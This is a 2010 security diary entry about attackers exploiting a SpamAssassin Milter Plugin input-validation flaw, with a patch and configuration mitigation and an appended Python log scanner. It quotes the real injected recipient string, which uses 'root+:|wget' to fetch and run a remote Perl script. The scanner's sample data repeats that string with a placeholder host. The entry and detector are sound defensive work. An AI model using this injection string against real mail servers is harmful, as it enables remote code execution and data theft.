Today's Diary: Spamassassin Milter Plugin Remote Root Attack
If you have more information or corrections regarding our diary, please share.
Last Updated: 2010-03-15 14:07:20 UTC
by Adrien de Beaupre (Version: 2)
Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:
Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt: smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)
Handler Bojan notes that the bad guys appear to have started actively exploiting the SpamAssassin milter vulnerability that was published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).
The Perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80. That host appears to be unreachable at the moment, though.
Update: SecurityFocus BID 38578
Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136
Alternatively, don't use the -x option when running this plugin, and do not run it as root.
Cheers,
Adrien de Beaupré
EWA-Canada.com
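To look for the same pattern in your own mail logs, the following is an added example (not part of the original diary) that flags recipients containing shell syntax, like the "root+:|wget ...;perl p.txt" address Roy saw. The log lines are constructed samples in Postfix style, and example.invalid and 192.0.2.10 are placeholders; the function name and the character set are assumptions of this sketch.

```python
import re

# Characters a shell treats specially. Some are legal in an RFC 5322 local
# part, but they are rare in real recipients, so a hit deserves review.
SHELL_META = re.compile(r"[|;`&]|\$\(")
# Recipient as logged: everything after "to=<" up to '>' or end of line,
# because the injected address contains spaces and may be logged truncated.
RCPT = re.compile(r"to=<([^>\n]*)")
SENDER = re.compile(r"from=<([^>\n]*)>")


def find_suspicious_recipients(lines):
    """Return one finding per log line whose recipient holds shell syntax."""
    findings = []
    for number, line in enumerate(lines, start=1):
        rcpt = RCPT.search(line)
        if not rcpt:
            continue  # line carries no recipient field
        address = rcpt.group(1).strip()
        hits = sorted(set(SHELL_META.findall(address)))
        if hits:
            sender = SENDER.search(line)
            findings.append({
                "line": number,
                "sender": sender.group(1) if sender else None,
                "recipient": address,
                "metachars": hits,
            })
    return findings


# Constructed sample lines (not taken from the diary).
SAMPLE_LOG = [
    "Mar 15 09:12:01 mx postfix/smtpd[2211]: NOQUEUE: reject: RCPT from "
    "unknown[192.0.2.10]: 550 5.1.1 User unknown in local recipient table; "
    "from=<blue@attacker.com> "
    "to=<root+:|wget hxxp://example.invalid/p.txt;perl p.txt> proto=SMTP",
    "Mar 15 09:13:40 mx postfix/qmgr[900]: 4F2A1: from=<alice@example.org>, size=2048",
    "Mar 15 09:13:41 mx postfix/local[2290]: 4F2A1: to=<bob+lists@example.org>, status=sent",
    # Summary-style line where the recipient is cut off before any '>'.
    "Messages rejected to recipient: x; from=<blue@attacker.com> to=<root+:|wget",
]

if __name__ == "__main__":
    for f in find_suspicious_recipients(SAMPLE_LOG):
        print(f"line {f['line']}: from={f['sender']} "
              f"rcpt={f['recipient']!r} chars={f['metachars']}")
```

A hit in a "User unknown" rejection only shows that the attempt reached your server; whether the milter is exposed still depends on the -x option and the patch mentioned above.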

